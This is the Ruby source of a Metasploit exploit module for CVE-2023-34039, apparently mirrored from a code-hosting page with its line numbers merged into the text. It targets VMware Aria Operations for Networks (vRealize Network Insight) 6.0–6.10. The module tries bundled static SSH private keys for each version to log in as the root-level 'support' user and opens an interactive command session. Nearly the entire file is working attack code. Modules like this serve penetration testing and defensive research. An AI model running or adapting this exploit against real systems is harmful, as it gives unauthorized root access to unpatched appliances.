Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/linux/ssh/vmware_vrni_known_privkey.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'net/ssh'6require 'net/ssh/command_stream'78class MetasploitModule < Msf::Exploit::Remote9include Msf::Auxiliary::Report10include Msf::Exploit::Remote::SSH1112Rank = ExcellentRanking1314def initialize(info = {})15super(16update_info(17info,18{19'Name' => 'VMWare Aria Operations for Networks (vRealize Network Insight) SSH Private Key Exposure',20'Description' => %q{21VMWare Aria Operations for Networks (vRealize Network Insight) versions 6.0.0 through 6.10.022do not randomize the SSH keys on virtual machine initialization. Since the key is easily23retrievable, an attacker can use it to gain unauthorized remote access as the "support" (root) user.24},25'Platform' => 'unix',26'Arch' => ARCH_CMD,27'Privileged' => true,28'Targets' => [29[ '6.0_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.0.0_platform') } ],30[ '6.0_proxy', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.0.0_proxy') } ],31[ '6.1_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.1.0_platform') } ],32[ '6.1_proxy', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.1.0_proxy') } ],33[ '6.2_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.2.0_collector') } ],34[ '6.2_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.2.0_platform') } ],35[ '6.3_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.3.0_collector') } ],36[ '6.3_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.3.0_platform') } ],37[ '6.4_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.4.0_collector') } ],38[ '6.4_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.4.0_platform') } ],39[ '6.5_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.5.0_collector') } ],40[ '6.5_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.5.0_platform') } ],41[ '6.6_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.6.0_collector') } ],42[ '6.6_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.6.0_platform') } ],43[ '6.7_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.7.0_collector') } ],44[ '6.7_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.7.0_platform') } ],45[ '6.8_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.8.0_collector') } ],46[ '6.8_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.8.0_platform') } ],47[ '6.9_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.9.0_collector') } ],48[ '6.9_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.9.0_platform') } ],49[ '6.10_collector', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.10.0_collector') } ],50[ '6.10_platform', { 'key' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-34039', 'id_rsa_vnera_keypair_6.10.0_platform') } ],51[52'All', {} # built later53],54],55'Payload' => {56'Compat' => {57'PayloadType' => 'cmd_interact',58'ConnectionType' => 'find'59}60},61'Author' => [62'h00die', # MSF module63'SinSinology', # PoC64'Harsh Jaiswal (@rootxharsh)', # Discovery65'Rahul Maini (@iamnoooob)' # Discovery66],67'License' => MSF_LICENSE,68'References' => [69['CVE', '2023-34039'],70['URL', 'https://github.com/sinsinology/CVE-2023-34039'],71['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-34039/'],72['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0018.html'],73],74'DisclosureDate' => '2023-08-29',75'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },76'DefaultTarget' => 22,77'Notes' => {78'Stability' => [CRASH_SAFE],79'Reliability' => [REPEATABLE_SESSION],80'SideEffects' => [IOC_IN_LOGS]81}82}83)84)8586register_options(87[88# Since we don't include Tcp, we have to register this manually89Opt::RHOST(),90Opt::RPORT(22)91], self.class92)9394register_advanced_options(95[96OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),97OptBool.new('STOP_ON_SUCCESS', [ false, 'Stop on successful login', true]),98OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time in seconds to negotiate a SSH session', 30])99]100)101end102103# helper methods that normally come from Tcp104def rhost105datastore['RHOST']106end107108def rport109datastore['RPORT']110end111112def do_login(user, key_data)113opt_hash = ssh_client_defaults.merge({114auth_methods: ['publickey'],115port: rport,116key_data: [ key_data ]117})118opt_hash.merge!(verbose: :debug) if datastore['SSH_DEBUG']119begin120ssh_socket = nil121::Timeout.timeout(datastore['SSH_TIMEOUT']) do122ssh_socket = Net::SSH.start(rhost, user, opt_hash)123end124rescue Rex::ConnectionError125print_error "#{rhost}:#{rport} SSH - Unable to connect"126return nil127rescue Net::SSH::Disconnect, ::EOFError128print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"129return nil130rescue ::Timeout::Error131print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"132return nil133rescue Net::SSH::AuthenticationFailed134print_error "#{rhost}:#{rport} SSH - Failed authentication"135return nil136rescue Net::SSH::Exception => e137print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"138return nil139end140141if ssh_socket142# Create a new session from the socket, then close it.143conn = Net::SSH::CommandStream.new(ssh_socket)144ssh_socket = nil145146return conn147end148nil149end150151def exploit152if target.name == 'All'153keys = targets.filter_map { |t| t.opts['key'] if t.name != 'All' }154else155keys = [target.opts['key']]156end157158keys.each do |key|159vprint_status("Attempting key: #{key}")160key_data = File.read(key, mode: 'rb')161conn = do_login('support', key_data)162next unless conn163164print_good "#{rhost}:#{rport} - Successful login via support@#{rhost}:#{rport} and ssh key: #{key}"165handler(conn.lsock)166break if datastore['STOP_ON_SUCCESS']167end168end169end170171172